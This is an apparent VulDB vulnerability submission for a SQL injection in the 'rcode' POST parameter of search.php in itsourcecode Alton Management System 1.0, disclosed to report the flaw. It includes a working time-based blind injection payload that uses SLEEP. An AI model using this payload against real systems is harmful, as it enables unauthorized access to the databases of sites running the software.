| Title | itsourcecode Alton Management System 1.0 SQLi search.php |
|---|
| Description | The rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection.
-------------------POC---------------
Parameter: rcode (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/27/2024 12:20 (2 years ago) |
|---|
| Moderation | 07/30/2024 15:29 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 273142 [itsourcecode Alton Management System 1.0 search.php rcode sql injection] |
|---|
| Points | 20 |
|---|